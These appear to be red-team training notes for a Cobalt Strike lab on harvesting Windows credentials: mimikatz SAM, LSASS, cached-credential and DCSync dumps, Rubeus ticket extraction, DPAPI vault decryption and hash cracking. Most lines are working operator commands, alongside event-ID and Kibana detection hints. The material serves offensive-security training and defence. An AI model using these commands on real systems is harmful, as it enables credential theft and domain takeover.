obtaining credentials

Different forms

plaintext (username:password)
hashes (NTLM, AES, DCC, NetNTLM, etc.)
Kerberos tickets

integrated mimikatz

every command is started in a separate process so that you have to combine related commands
In Cobalt Strike (! elevates to system, @ elevates to thread token)

beacon> mimikatz !lsadump::sam

NTLM hashes

This module will open a read handle to LSASS which can be logged under event 4656. Use the “Suspicious Handle to LSASS” saved search in Kibana to see them.

beacon> mimikatz !sekurlsa::logonpasswords
beacon> logonpasswords

You can see dumped credentials in view → credentials too

kerberos encryption keys

beacon> mimikatz !sekurlsa::ekeys

In this case, the AES256 key is the one we want. These hashes are not automatically populated into the Credential data model, but they can be added manually via View → Credentials → Add

security account manager (SAM)

NTLM accounts of local hashes

beacon> mimikatz !lsadump::sam

This module will open a handle to the SAM registry hive. Use the “Suspicious SAM Hive Handle” saved search in Kibana to see them.

domain cached credentials (DCC)

Domain Cached Credentials (DCC) was designed for instances where domain credentials are required to logon to a machine, even whilst it’s disconnected from the domain (think of a roaming laptop for example). The local device caches the domain credentials so authentication can happen locally, but these can be extracted and cracked offline to recover plaintext credentials.

beacon> mimikatz !lsadump::cache

Those can only be used for cracking. Format for hashcat: $DCC2$<iterations>#<username>#<hash>

This module will open a handle to the SECURITY registry hive. Use the “Suspicious SECURITY Hive Handle” saved search in Kibana to see them.

DCSync

Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.

This requires GetNCChanges which is usually only available to domain admins. The technique is included here for completeness, and it will be useful later on.

beacon> make_token DEV\nlamb F3rrari

Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set).

Find these using the “Suspicious Directory Replication” saved search in Kibana.

extracting kerberos tickets

more about this in Pass-the-Ticket (Kerberos)

beacon> execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe triage

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap

dpapi

DPAPI is used by the Windows Credential Manager to store saved secrets such as RDP credentials, and by third-party applications like Google Chrome to store website credentials.

list credentials in vault

beacon> run vaultcmd /list
beacon> run vaultcmd /listcreds:"Windows Credentials" /all

or use seatbelt

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault

get encryption key

# list credential files on filesystem
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
 
# encryption keys are also encrypted:S
beacon> ls C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
 
#get master encryption key
beacon> mimikatz !sekurlsa::dpapi
 
#or request backup key from domain controller
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc

decrypt encrypted credentials

This will only work if executed in the context of the user who owns the key. If your Beacon is running as another user or SYSTEM, you must impersonate the target user somehow first, then execute the command using the @ modifier.

beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214

scheduled task credentials

# List them:
beacon> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
 
# Get guid of master key:
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E
 
# dump masterkey
beacon> mimikatz !sekurlsa::dpapi
 
# then decrypt:
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9

password cracking

john the ripper, hashcat
wordlist: rockyou
crack NTLM hashes
rule to add years
using rules and masks

🪴 Quartz 4.0

Explorer

4_credentials and cracking